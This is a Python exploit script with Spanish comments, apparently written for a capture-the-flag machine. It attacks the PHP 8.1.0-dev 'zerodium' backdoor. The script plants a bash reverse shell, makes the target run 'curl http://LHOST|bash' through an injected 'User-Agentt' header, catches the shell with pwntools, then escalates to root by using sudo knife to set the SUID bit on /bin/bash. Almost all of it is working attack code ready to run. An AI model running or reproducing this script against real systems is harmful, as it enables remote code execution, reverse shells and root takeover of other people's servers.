autopwn_knife.py

1. #!/usr/bin/python3
2.  
3. # Exploit Title: PHP 8.1.0-dev Backdoor Remote Code Execution
4. # Date: 26/08/21
5. # Exploit Author: H4ckBl0g
6. # Version: 8.1.0-dev
7. # CVE : N/A
8. # References:
9. #     - https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a
10. #     - https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md
11. #Uso: python3 autopwn_knife.py <LHOST> <URL>
12. #Ejemplo: python3 autopwn_knife.py 10.10.16.198 http://10.10.10.242/
13.  
14. import sys
15. import os
16. import time
17. import threading
18. import requests
19. import signal
20. import subprocess
21. from pwn import *
22.  
23.  
24. if len(sys.argv) != 3:
25.     print("\nUso: python3 autopwn_knife.py <LHOST> <URL>\n\nEjemplo: python3 autopwn_knife.py 10.10.16.198 http://10.10.10.242/")
26.     sys.exit(1)
27.  
28.  
29. #Variables
30. URL = sys.argv[2]
31. LHOST = sys.argv[1]
32. LPORT = 443
33.  
34. #Funciones
35. def def_handler(sig, frame):
36.     print("\n[!] Saliendo...\n")
37.     sys.exit(1)
38.  
39. # Ctrl+C
40. signal.signal(signal.SIGINT, def_handler)
41.  
42.  
43. def obtainShell():
44.     try:
45.         p1 = log.progress("\nCreando archivo index.html con contenido malicioso\n")
46.         os.system('echo "#!/bin/bash\n\nbash -i >& /dev/tcp/%s/443 0>&1" > index.html' %LHOST)
47.         s = requests.Session()
48.         cmd_header = {
49.             'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
50.             'User-Agentt' : 'zerodiumsystem("curl http://%s|bash");' %LHOST
51.         }
52.         subprocess.Popen(["timeout", "10", "python3", "-m", "http.server", "80"])
53.         time.sleep(1)
54.         r = s.get(URL, headers=cmd_header)
55.         time.sleep(1)
56.    
57.  
58.     except Exception as e:
59.         print(e)
60.  
61.  
62.  
63. if __name__ == '__main__':
64.     try:
65.         threading.Thread(target=obtainShell).start()
66.     except Exception as e:
67.         log.error(str(e))
68.     shell = listen(LPORT, timeout=5).wait_for_connection()
69.  
70.     if shell.sock is None:
71.         log.failure("No se ha obtenido conexion")
72.         sys.exit()
73.     else:
74.         log.success("\n ✔️  Se ha obtenido una shell ✔️ \n")
75.         os.system("rm index.html")
76.         time.sleep(1)
77.         shell.sendline("""sudo /usr/bin/knife exec -E 'exec "chmod +s /bin/bash"'""")
78.         shell.sendline("bash -p")
79.         shell.sendline("whoami")
80.  
81.     shell.interactive()
82.  
83.